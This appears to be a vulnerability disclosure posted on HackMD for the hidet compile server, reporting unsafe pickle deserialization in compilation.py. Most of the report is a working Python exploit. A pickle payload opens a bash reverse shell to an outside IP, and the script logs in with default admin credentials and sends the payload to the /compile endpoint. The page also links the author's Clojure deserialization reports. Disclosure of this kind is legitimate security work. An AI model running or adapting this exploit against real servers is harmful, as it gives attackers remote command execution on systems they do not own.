# hidet - pickle.loads **Describe the bug** In apps/compile server/resources/compilation. Py 126 lines, after get complie server validation, the risk of python deserialization attack can achieve command execution, etc. **Additional context** ```python import pickle import base64 import requests import json class System(object): """Create os.system command""" def __reduce__(self): import os return (os.system,('bash -c "bash -i >& /dev/tcp/100.92.79.102/8899 0>&1"',)) code = System() data1 = pickle.dumps(code) print(base64.b64encode(data1)) # default username and password auth_data = """{ "username": "admin", "password": "admin_password" }""" auth_header = { "content-type": "application/json" } auth_url = "http://100.92.79.102:3281/auth" auth_res = requests.post(auth_url, data=auth_data, headers=auth_header) print(auth_res.text) token = json.loads(auth_res.text) headers = { "authorization":"Bearer " + token["access_token"] } res = requests.post('http://100.92.79.102:3281/compile',headers=headers, data=data1) print(res.text) ``` ![20240327_110919](https://hackmd.io/_uploads/ryzxJGWkR.gif)
Last changed by  
fe1w0
24

Read more

(Not Accepted)

Vulnerability Details - Potential Command Execution via Deserialization Exploit Chain in Specific Component Combinations

3/21/2024
Vulnerability Details - Clojure Command Injection by Deserialization

Under org.clojure:clojure == 1.12.0-alpha5, there exists a denial of service attack initiated through deserialization. By constructing appropriate objects, continuous hashcode calculations can be initiated.

1/25/2024
Vulnerability Details - Clojure Dos by Deserialization

Translation:

1/17/2024
Read more from fe1w0
Published on HackMD